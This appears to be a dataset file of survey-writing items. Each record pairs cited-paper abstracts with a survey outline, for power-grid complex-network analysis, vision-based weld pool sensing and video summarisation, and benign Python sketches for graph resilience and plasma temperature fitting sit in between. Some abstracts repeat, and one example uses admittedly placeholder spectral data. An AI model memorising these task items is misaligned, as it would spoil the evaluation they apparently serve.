Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). 
Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. ---
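The abstracts above repeatedly characterise a grid by the same small set of topological statistics (average degree, characteristic path length, clustering coefficient) and compare them against Erdos-Renyi and Watts-Strogatz reference graphs. The sketch below is illustrative only and is not taken from any of the surveyed papers; it assumes the Python networkx library, and the toy edge list stands in for a real bus/branch list.

```python
# Minimal sketch: small-world statistics of a power-grid graph (assumes networkx).
# Any iterable of (bus_i, bus_j) pairs can be passed in place of the toy edge list.
import networkx as nx

def small_world_stats(edges):
    G = nx.Graph()
    G.add_edges_from(edges)
    G.remove_edges_from(nx.selfloop_edges(G))
    n, m = G.number_of_nodes(), G.number_of_edges()
    k_avg = 2.0 * m / n                                   # average degree
    # Path length is only defined on a connected graph; use the giant component.
    giant = G.subgraph(max(nx.connected_components(G), key=len)).copy()
    L = nx.average_shortest_path_length(giant)            # characteristic path length
    C = nx.average_clustering(G)                           # clustering coefficient
    # Reference graphs with matched size/degree, as in the surveyed comparisons.
    er = nx.erdos_renyi_graph(n, k_avg / (n - 1), seed=1)
    ws = nx.watts_strogatz_graph(n, max(2, int(round(k_avg))), 0.1, seed=1)
    return {"nodes": n, "edges": m, "avg_degree": k_avg,
            "path_length": L, "clustering": C,
            "er_clustering": nx.average_clustering(er),
            "ws_clustering": nx.average_clustering(ws)}

if __name__ == "__main__":
    # Toy example: a ring with a few shortcuts stands in for a real grid.
    demo_edges = [(i, (i + 1) % 20) for i in range(20)] + [(0, 10), (5, 15)]
    print(small_world_stats(demo_edges))
```

In the comparisons reported above, a real grid typically combines a short characteristic path length with clustering well above the Erdos-Renyi value, which is the small-world signature the surveyed studies test for.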
Title: The Power Grid as a Complex Network: a Survey Section 1: Introduction Description 1: Outline the purpose and scope of the survey, provide background on Complex Network Analysis (CNA), and explain its relevance to the study of power grids. Section 2: Background and Survey Methodology Description 2: Define common terms and concepts used in CNA, provide essential graph theory definitions, and describe the methodology used to analyze and compare studies in the survey. Section 3: The Power Grid as a Complex Network Description 3: Discuss the application of complex network analysis to power grids and describe the specific studies reviewed in this survey. Section 4: Basic Power Grid Characteristics Description 4: Identify and compare basic non-technical characteristics of the power grids analyzed in various studies, such as geography, type of Grid (high, medium, low voltage), and sample size. Section 5: Statistical Global Graph Properties Description 5: Summarize the main statistical properties of the power grids under analysis, including order, size, average degree, node degree distribution, and betweenness distribution. Section 6: The Small-World Property Description 6: Examine whether the power grids analyzed exhibit the small-world property and compare findings from various studies. Section 7: Node Degree Distribution Description 7: Summarize findings on the degree of nodes within the power grids and fit these findings into distribution models, such as exponential or power-law distributions. Section 8: Betweenness Distribution Description 8: Describe the distribution of betweenness centrality in the power grids and its implications on the infrastructure's robustness. Section 9: Resilience Analysis Description 9: Compare the resilience of different power grids to random failures and targeted attacks on nodes and edges, and describe the metrics used to assess this resilience. Section 10: Studies with Infrastructure Improvement Analysis Description 10: Review studies that propose and assess strategies for improving the reliability and robustness of the power grids. Section 11: Further Studies Description 11: Highlight additional analyses and investigations from the surveyed studies that provide unique insights into the power grid as a complex network. Section 12: Discussion and Conclusion Description 12: Summarize the overall findings of the survey, discuss common patterns and notable differences, and provide recommendations for future research directions.
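Section 9 of the outline above concerns resilience to random failures and targeted attacks, which several of the cited studies measure purely topologically by removing nodes and tracking the size of the largest connected component. The sketch below is a generic version of that experiment, not the procedure of any particular paper; it again assumes networkx, and the Watts-Strogatz graph is only a stand-in for a real grid topology.

```python
# Minimal sketch of a purely topological failure/attack experiment (assumes networkx):
# remove nodes at random or in decreasing degree order and track the giant component
# as a fraction of the original network size (a simple connectivity-loss measure).
import random
import networkx as nx

def giant_fraction(G, n_ref):
    if G.number_of_nodes() == 0:
        return 0.0
    return max(len(c) for c in nx.connected_components(G)) / n_ref

def removal_curve(G, strategy="random", steps=20, seed=0):
    rng = random.Random(seed)
    H = G.copy()
    n0 = H.number_of_nodes()
    per_step = max(1, n0 // steps)
    curve = [(0.0, giant_fraction(H, n0))]
    while H.number_of_nodes() > per_step:
        if strategy == "random":                  # random failures
            victims = rng.sample(list(H.nodes()), per_step)
        else:                                     # targeted attack on highest-degree nodes
            ranked = sorted(H.degree, key=lambda kv: kv[1], reverse=True)[:per_step]
            victims = [node for node, _deg in ranked]
        H.remove_nodes_from(victims)
        removed = 1.0 - H.number_of_nodes() / n0
        curve.append((removed, giant_fraction(H, n0)))
    return curve

if __name__ == "__main__":
    G = nx.watts_strogatz_graph(200, 4, 0.05, seed=1)  # stand-in for a grid topology
    print("random :", removal_curve(G, "random")[:5])
    print("attack :", removal_curve(G, "degree")[:5])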
Vision-based sensing of the welding process: a survey
5
--- paper_title: Vision Based GTA Weld Pool Sensing and Control Using Neurofuzzy Logic paper_content: --- paper_title: A sensing torch for on-line monitoring of the gas tungsten arc welding process of steel pipes paper_content: Non-intrusive and real-time monitoring techniques are increasingly required by manufacturing industry in order to detect flaws in arc welding processes. In this work the development of an optical inspection system, for monitoring the manual gas tungsten arc welding (GTAW) process of steel pipes, is described. The arc plasma visible emission produced during the process was acquired and spectroscopically analysed. Measuring the intensities of selected argon emission lines allowed real time calculation and recording of the axial electron temperature of the plasma. Experimental results showed that the temperature signal varies greatly in the case of instabilities of the weld pool that cause weld defects. A suitable algorithm, based on a statistical analysis of the signal, was developed in order to real time flag defective joints. It is shown that several weld defects such as porosity, dropout, lack of fusion, solid inclusions and craters were successfully detected in a production environment. The performances of the optical sensor were compared with the results of state-of-the-art post-weld controls such as x-rays and penetrating dyes, showing good agreement and thus demonstrating the validity of this quality monitoring system. --- paper_title: Determination of axial thermal plasma temperatures without Abel inversion paper_content: This paper presents an approximate formula for the determination of local axis temperatures of an inhomogeneous, axisymmetric, optically thin, local thermodynamic equilibrium plasma column without using the Abel inversion technique. The proposed method is straightforward and is based on recording the spatially integrated radiances of spectral lines. The formula is useful for high gradients thermal plasma columns of the type found in DC electric arcs or plasma jets of Gaussian shaped temperature profile. The formulation permits a simple experimental arrangement for rapid monitoring or control of parameters in industrial plasma devices or for the determination of emissivities and line transition probabilities. We also show that the method can be applied to spatially unstable arc discharges, where traditional techniques are difficult and cumbersome to apply. --- paper_title: Spectroscopic studies of plasma during cw laser materials interaction paper_content: The role of plasma during cw laser materials interaction was studied using emission spectroscopy. The experiments were carried out in two stages: first, with a pure argon plasma; and second, with an aluminum target in an argon atmosphere. The electron-temperature distribution and electron density were determined. The experimental results were used to estimate laser attenuation and refraction as the beam propagated through the plasma column. Thus, transmitted energy and energy distribution on the target surface were determined.
This was expected to be a more realistic input for transport phenomena models based on absorbed energy. --- paper_title: Spectroscopic Study Of Laser-Induced Plasma In The Welding Process Of Steel And Aluminium paper_content: Results of spectral diagnostics of the plasma produced by intense laser radiation during the welding process of steel and aluminium with CO2 lasers are presented. The experiments were carried out in an intensity range I = 10^6 ÷ 10^7 W/cm^2 and with He, N2, CO2, Ar as shielding gases. The electron plasma temperature T and density n were measured under various processing and shielding gas conditions. It is shown that the time-averaged plasma temperature correlates with the welding results such as e.g. the welding depth obtained by variation of the welding speed and process gas. In this way it is demonstrated that spectral characteristics of the plasma can be used in the monitoring of the plasma and in the optimization of the welding process. Furthermore, it is shown that spectroscopic results help to explain the influence of the process gas. Examples of cooling, heating and shielding effects caused by process gases are shown and discussed in view of the efficiency of the welding process. --- paper_title: Experimental study of laser-induced plasma in welding conditions with continuous CO2 laser paper_content: Laser-induced plasmas obtained during a welding process have been studied. Spectroscopic diagnostics and an integrating sphere collecting the reflected CO2 light are the principal diagnostics used in order to determine the spatial variations of the microscopic parameters such as electron density and temperature, and the energy absorption during this process. For several experimental processing conditions of shielding gases, the main perturbing effects such as absorption and refraction of the CO2 laser radiation are quantified. Several possibilities for reducing these perturbing effects are then discussed. --- paper_title: Spectroscopic characterization of laser-induced plasma created during welding with a pulsed Nd:YAG laser paper_content: A spectroscopic study of a laser-induced plume created during the welding of stainless steel and other materials (iron and chromium) has been carried out. A pulsed Nd:YAG laser of 1000 W average power is used. The evolutions of the electron temperature and electron density have been studied for several welding parameters. We use working powers from 300 to 900 W and pulse durations between 1.5 and 5 ms. The influence of shielding gases like nitrogen and argon has been taken into account. Temperature and density calculations are based on the observation of the relative intensities and shapes of the emission peaks. We assume that the plasma is in local thermal equilibrium. The temperature is calculated with the Boltzmann plot method and the density with the Stark broadening of an iron line. The electron temperatures vary in the range of 4500–7100 K, electron density between 3×10^22 and 6.5×10^22 m^-3. The absorption of the laser beam in the plasma is calculated using the Inverse Bremsstrahlung theory.
--- paper_title: Weld pool edge detection for automated control of welding paper_content: A vision system that determines the edges of the weld pool in sequences of gas-tungsten-arc welding images acquired by a coaxial viewing system is described. The vision system uses a transformation that maps the edge of a weld pool into a vertical line. The weld pool edge is detected in the transform domain by using a directional filter, which retains only intensity changes of interest, and a one-dimensional edge detector. The edge of the weld pool, in the physical domain, is determined using the inverse transformation. The transformation uses parameters that are updated when processing a sequence of images, and are initially determined by analyzing the first image frame in the physical domain. --- paper_title: An image analysis system for coaxially viewed weld scenes paper_content: We present a complete, working system for analyzing coaxially viewed robotic weld scenes. The analysis is cast in the form of a consistent labeling problem in which the objects are small image regions from a regular tessellation and the possible labels are base metal, electrode, gas cup, filler wire, weld bead, and weld pool. Local domain knowledge and measurements on the image function are used to produce an initial set of labeling probabilities. These are then adjusted by probabilistic relaxation using global domain knowledge to arrive at a final consistent labeling, which constitutes the image analysis. The primary goal of this analysis is a sufficiently accurate description of the size and shape of the weld pool to allow quality monitoring of the welding process. This represents a significant departure from the primary objectives of prior work in this area, most of which has focused on the seam tracking problem. Discussions with welding engineers indicate that they are anxious to acquire whatever information may be available. Thus, this system serves the secondary goal of providing some idea of what might be possible, given both relatively modest, and therefore affordable, resources and a real time performance requirement. In constructing and demonstrating a complete system, we provide useful insight into the engineering of such systems for practical applications, addressing attribute extraction, feature selection, and statistical region classification. A novel, efficient near-optimal feature selection algorithm which we call ratchet search is also presented. Finally, we discuss how such a system, which is quite robust, could be embedded into robotic welding systems to provide important weld quality analysis for process control. --- paper_title: Sensing and Control of Weld Pool Geometry for Automated GTA Welding paper_content: Weld pool geometry is a crucial factor in determining welding quality, especially in the case of sheet welding. Its feedback control should be a fundamental requirement for automated welding.
However, the real-time precise measurement of pool geometry is a difficult procedure. It has been shown that vision sensing is a promising approach for monitoring the weld pool geometry. Quality images that can be processed in real-time to detect the pool geometry are acquired by using a high shutter speed camera assisted with nitrogen laser as an illumination source. However, during practical welding, impurities or oxides existing on the pool surface complicate image processing. The image features are analyzed and utilized for effectively processing the image. It is shown that the proposed algorithm can always detect the pool boundary with sufficient accuracy in less than 100 ms. Based on this measuring technique, a robust adaptive system has been developed to control the pool area. Experiments show that the proposed control system can overcome the influence caused by various disturbances. --- paper_title: Vision-based measurement of weld pool geometry in constant-current gas tungsten arc welding paper_content: AbstractThe common commercial charge coupled device (CCD) camera is combined with a composite light filter to form a vision sensing system of low cost. It can capture the whole image of a weld pool clearly during constant-current gas tungsten arc welding (GTAW). Based on the image-processing algorithm, the edges of the weld pool under different welding conditions can be extracted. Calibration is made to obtain the weld pool geometry in real size. The measured results are useful for developing a welding process control system and verifying the mathematical models of weld pool behaviours. --- paper_title: Computation of 3D weld pool surface from the slope field and point tracking of laser beams paper_content: A novel computation method of the 3D weld pool surface from specular reflection of laser beams is presented in this paper. The mathematical model for the three-dimensional surface measurement technique has been developed. The structured pattern of a laser is projected on the weld pool in a molten state and the reflection observed using a CCD camera. These reflected patterns can be tracked using image processing techniques including optical flow and moving point tracking. A simulation model has been developed implementing these techniques. The movement of the reflected laser during the welding process is indicative of the change in state of the weld pool. The surface slope field is calculated from the law of reflection and is used to compute the 3D surface of the weld pool. The measurement technique is tested on objects with a priori knowledge of geometry having a specular surface to test the effectiveness of the measurement technique. --- paper_title: Real-Time Image Processing for Monitoring of Free Weld Pool Surface paper_content: The arc weld pool is always deformed by plasma jet. In a previous study, a novel sensing mechanism was proposed to sense the free weld pool surface. The specular reflection of pulsed laser stripes from the mirror-like pool surface was captured by a CCD camera. The distorted laser stripes clearly depicted the 3D shape of the free pool surface. To monitor and control the welding process, the on-line acquisition of the reflection pattern is required. In this work, the captured image is analyzed to identify the torch and electrode. The weld pool edges are then detected. Because of the interference of the torch and electrode, the acquired pool boundary may be incomplete. To acquire the complete pool boundary, models have been fitted using the edge points. 
Finally, the stripes reflected from the weld pool are detected. Currently, the reflection pattern and pool boundary are being related to the weld penetration and used to control the weld penetration. --- paper_title: A novel stereo camera system by a biprism paper_content: We propose a novel and practical stereo camera system that uses only one camera and a biprism placed in front of the camera. The equivalent of a stereo pair of images is formed as the left and right halves of a single charge coupled device (CCD) image using a biprism. The system is therefore cheap and extremely easy to calibrate since it requires only one CCD camera. An additional advantage of the geometrical setup is that corresponding features lie on the same scanline automatically. The single camera and biprism have led to a simple stereo system for which correspondence is very easy and accurate for nearby objects in a small field of view. Since we use only a single lens, calibration of the system is greatly simplified. Given the parameters in the biprism-stereo camera system, we can reconstruct the three-dimensional structure using only the disparity between the corresponding points. --- paper_title: Computation of 3D weld pool surface from the slope field and point tracking of laser beams paper_content: A novel computation method of the 3D weld pool surface from specular reflection of laser beams is presented in this paper. The mathematical model for the three-dimensional surface measurement technique has been developed. The structured pattern of a laser is projected on the weld pool in a molten state and the reflection observed using a CCD camera. These reflected patterns can be tracked using image processing techniques including optical flow and moving point tracking. A simulation model has been developed implementing these techniques. The movement of the reflected laser during the welding process is indicative of the change in state of the weld pool. The surface slope field is calculated from the law of reflection and is used to compute the 3D surface of the weld pool. The measurement technique is tested on objects with a priori knowledge of geometry having a specular surface to test the effectiveness of the measurement technique. --- paper_title: A novel stereo camera system by a biprism paper_content: We propose a novel and practical stereo camera system that uses only one camera and a biprism placed in front of the camera. The equivalent of a stereo pair of images is formed as the left and right halves of a single charge coupled device (CCD) image using a biprism. The system is therefore cheap and extremely easy to calibrate since it requires only one CCD camera. An additional advantage of the geometrical setup is that corresponding features lie on the same scanline automatically. The single camera and biprism have led to a simple stereo system for which correspondence is very easy and accurate for nearby objects in a small field of view. Since we use only a single lens, calibration of the system is greatly simplified. Given the parameters in the biprism-stereo camera system, we can reconstruct the three-dimensional structure using only the disparity between the corresponding points. --- paper_title: Mathematical formulation and simulation of specular reflection based measurement system for gas tungsten arc weld pool surface paper_content: Weld pool surface can change dynamically during welding and is indicative of information critical to controlling the process. 
Research has picked up in the field of observing the weld pool surface to understand the dynamics of the welding process. This paper will help visualize and understand the physics involved in observing the weld pool surface. A study of laser properties, weld pool and camera optics was incorporated in developing a model to describe the mechanism of observing the weld pool surface from specular reflection. This observation method projects a laser beam on the pool surface through an optical grid with a frosted glass attached. The corresponding specular reflection is calculated, which is derived based on the reflection law. The reflected laser beams are then captured by the camera to form the image. The model can be used to predict the outcome of experiments with grids placed in front of the laser and to determine the position where the camera should be placed to acquire the best image. Preliminary results showed that the camera should be placed with the weld pool along the optical axis, and the aperture should be as large as possible to allow as many rays into the camera as possible. The model can be used to find the optimal location of the laser and camera for materials of different thickness, by moving the electrode higher in the simulation, and adjusting the laser and camera location accordingly. The paper will give some insight into problems that might be encountered in observing the weld pool, and suggest the set-up of the laser and camera for obtaining the best image. --- paper_title: The variational approach to shape from shading paper_content: Abstract We develop a systematic approach to the discovery of parallel iterative schemes for solving the shape-from-shading problem on a grid. A standard procedure for finding such schemes is outlined, and subsequently used to derive several new ones. The shape-from-shading problem is known to be mathematically equivalent to a nonlinear first-order partial differential equation in surface elevation. To avoid the problems inherent in methods used to solve such equations, we follow previous work in reformulating the problem as one of finding a surface orientation field that minimizes the integral of the brightness error. The calculus of variations is then employed to derive the appropriate Euler equations on which iterative schemes can be based. The problem of minimizing the integral of the brightness error term is ill posed, since it has an infinite number of solutions in terms of surface orientation fields. A previous method used a regularization technique to overcome this difficulty. An extra term was added to the integral to obtain an approximation to a solution that was as smooth as possible. We point out here that surface orientation has to obey an integrability constraint if it is to correspond to an underlying smooth surface. Regularization methods do not guarantee that the surface orientation recovered satisfies this constraint. Consequently, we attempt to develop a method that enforces integrability, but fail to find a convergent iterative scheme based on the resulting Euler equations. We show, however, that such a scheme can be derived if, instead of strictly enforcing the constraint, a penalty term derived from the constraint is adopted. This new scheme, while it can be expressed simply and elegantly using the surface gradient, unfortunately cannot deal with constraints imposed by occluding boundaries. These constraints are crucial if ambiguities in the solution of the shape-from-shading problem are to be avoided. 
Different schemes result if one uses different parameters to describe surface orientation. We derive two new schemes, using unit surface normals, that facilitate the incorporation of the occluding boundary information. These schemes, while more complex, have several advantages over previous ones. --- paper_title: Technique for simultaneous real-time measurements of weld pool surface geometry and arc force paper_content: This paper describes a new technique for simultaneous real-time measurement of weld pool surface geometry and arc force. The weld pool surface profile is measured using real-time radiography by vertical x-ray transmission through the weld. The information is received at a rate of 30 frames per second in the form of two-dimensional images which are digitized and processed in real time by computer. The surface topography is determined from the images using the experimentally found relation between image brightness and material thickness with an accuracy of 0.2 mm (0.008 in.) --- paper_title: A study of arc force, pool depression and weld penetration during gas tungsten arc welding paper_content: Weld pool depression, arc force, weld penetration, and their interrelations have been studied as a function of welding current. Pool depression and welding arc force have been measured simultaneously using a recently developed technique. The authors found quadratic dependence of arc force on current, confirming similar findings in previous studies. Pool depression is essentially zero below a threshold level of current (200 A in this experiment) and then increases quadratically with current. A perfectly linear relation between arc force and pool depression was found in the current range from 200 to 350 A, with pool depression onset at about 0.35 g force (0.34 × 10^-2 N). The total surface tension and gravitational forces were calculated, from the measured surface topography, and found to be about five times that required to balance the arc force at 300 A. Thus electromagnetic and hydrodynamic forces must be taken into account to explain the measured levels of pool depression. The relation between weld penetration and pool depression for different welding currents has been established. Three distinct regimes of weld penetration as a function of weld current were found. ---
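The plasma-spectroscopy abstracts above compute the electron temperature with the Boltzmann plot method under the assumption of local thermodynamic equilibrium: for lines of one species, ln(I·λ/(g·A)) is linear in the upper-level energy with slope −1/(k_B·T_e). The sketch below illustrates that fit; the four spectral "lines" are placeholder values generated to be consistent with a temperature of roughly 7000 K (inside the 4500–7100 K range reported above), not real Fe I data.

```python
# Minimal sketch of the Boltzmann plot method (assumes local thermodynamic equilibrium).
# ln(I * lambda / (g * A)) = -E_upper / (k_B * T_e) + const, so a straight-line fit of
# that quantity against E_upper yields the electron temperature from the slope.
import numpy as np

K_B_EV = 8.617333262e-5  # Boltzmann constant in eV/K

def boltzmann_plot_temperature(intensity, wavelength_nm, g_upper, A_ul, E_upper_eV):
    y = np.log(np.asarray(intensity) * np.asarray(wavelength_nm)
               / (np.asarray(g_upper) * np.asarray(A_ul)))
    slope, _intercept = np.polyfit(np.asarray(E_upper_eV), y, 1)
    return -1.0 / (K_B_EV * slope)  # temperature in kelvin

if __name__ == "__main__":
    # Placeholder line table: intensity (a.u.), wavelength (nm), g, A (1/s), E_upper (eV).
    # Values fabricated for illustration so that the fit returns about 7000 K.
    I   = [722.0, 272.0, 191.0, 32.2]
    lam = [430.0, 432.0, 438.0, 441.0]
    g   = [9, 7, 7, 5]
    A   = [5.0e7, 4.0e7, 5.5e7, 3.0e7]
    Eu  = [3.0, 3.3, 3.7, 4.2]
    print("Te ~ %.0f K" % boltzmann_plot_temperature(I, lam, g, A, Eu))
```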
Title: Vision-based Sensing of the Welding Process: A Survey Section 1: Introduction Description 1: Introduce the importance and applications of vision-based sensors, particularly in the welding process. Section 2: Optical sensors Description 2: Discuss the use of optical sensors to study oscillations and spectral analysis of the weld pool, including detailed techniques and setups. Section 3: 2D analysis of the weld pool Description 3: Present various techniques for real-time observation and measurement of the 2D shape of the weld pool, including laser strobe systems, edge detection, and co-axial viewing methods. Section 4: 3D analysis of the weld pool Description 4: Explore methods for measuring the 3D shape of the weld pool surface, including structured light, stereovision methods, and slope field computations. Section 5: Conclusion Description 5: Summarize the survey, highlighting the effectiveness, limitations, and application contexts of different vision-based sensing techniques.
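The 3D weld-pool measurement papers above recover the pool surface from specular reflection: a projected laser ray obeys the law of reflection, so the observed reflected direction fixes the local surface normal and hence the slope field that is later integrated into a surface. The following is a minimal geometry sketch of that relation using plain numpy; the incidence angle and surface tilt in the example are hypothetical.

```python
# Minimal geometry sketch for specular-reflection-based surface sensing (pure numpy).
# Law of reflection: r = d - 2 (d . n) n for incident direction d and unit normal n.
# Conversely, when both the incident and the observed reflected directions are known,
# the local normal is the normalised bisector n ~ (r - d) / |r - d|, which gives the
# surface slope that the slope-field reconstruction methods integrate into a surface.
import numpy as np

def unit(v):
    v = np.asarray(v, dtype=float)
    return v / np.linalg.norm(v)

def reflect(d, n):
    d, n = unit(d), unit(n)
    return d - 2.0 * np.dot(d, n) * n

def normal_from_rays(d_incident, d_reflected):
    d, r = unit(d_incident), unit(d_reflected)
    return unit(r - d)

if __name__ == "__main__":
    # Hypothetical numbers: a ray arriving at 45 degrees onto a pool element whose
    # normal deviates 5 degrees from vertical.
    tilt = np.deg2rad(5.0)
    n_true = np.array([np.sin(tilt), 0.0, np.cos(tilt)])
    d_in = unit([1.0, 0.0, -1.0])
    d_out = reflect(d_in, n_true)
    n_est = normal_from_rays(d_in, d_out)
    slope_x = -n_est[0] / n_est[2]   # surface slope dz/dx implied by the normal
    print("recovered normal:", np.round(n_est, 6), " slope dz/dx:", round(slope_x, 6))
```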
Video summarisation: A conceptual framework and survey of the state of the art
10
--- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Exploring video content structure for hierarchical summarization paper_content: In this paper, we propose a hierarchical video summarization strategy that explores video content structure to provide the users with a scalable, multilevel video summary. First, video-shot- segmentation and keyframe-extraction algorithms are applied to parse video sequences into physical shots and discrete keyframes. Next, an affinity (self-correlation) matrix is constructed to merge visually similar shots into clusters (supergroups). Since video shots with high similarities do not necessarily imply that they belong to the same story unit, temporal information is adopted by merging temporally adjacent shots (within a specified distance) from the supergroup into each video group. A video-scene-detection algorithm is thus proposed to merge temporally or spatially correlated video groups into scenario units. This is followed by a scene-clustering algorithm that eliminates visual redundancy among the units. A hierarchical video content structure with increasing granularity is constructed from the clustered scenes, video scenes, and video groups to keyframes. 
Finally, we introduce a hierarchical video summarization scheme by executing various approaches at different levels of the video content hierarchy to statically or dynamically construct the video summary. Extensive experiments based on real-world videos have been performed to validate the effectiveness of the proposed approach. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. 
While there has been a lot of research in the multimedia community, there is no agreed-upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects, there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization (local, global, and meta-level) are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally, we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. --- paper_title: Doing Qualitative Research paper_content: A practical textbook guide to doing qualitative research, whose published contents are organized in seven parts: Introduction; Starting Out (selecting a topic, using theories, choosing a methodology, selecting a case, research ethics, and writing a research proposal); Collecting and Analyzing Your Data (including computer-assisted analysis and quality and evaluation criteria); Writing Up; Getting Support; Review; and The Aftermath (the oral examination, getting published, audiences, and finding a job). --- paper_title: Qualitative Data Analysis: A User Friendly Guide for Social Scientists paper_content: From the Publisher: Qualitative Data Analysis shows that learning how to analyse qualitative data by computer can be fun.
Written in a stimulating style, with examples drawn mainly from every day life and contemporary humour, it should appeal to a wide audience. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. While there has been a lot of research in the multimedia community there is no agreed upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization: local, global, and meta-level are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. 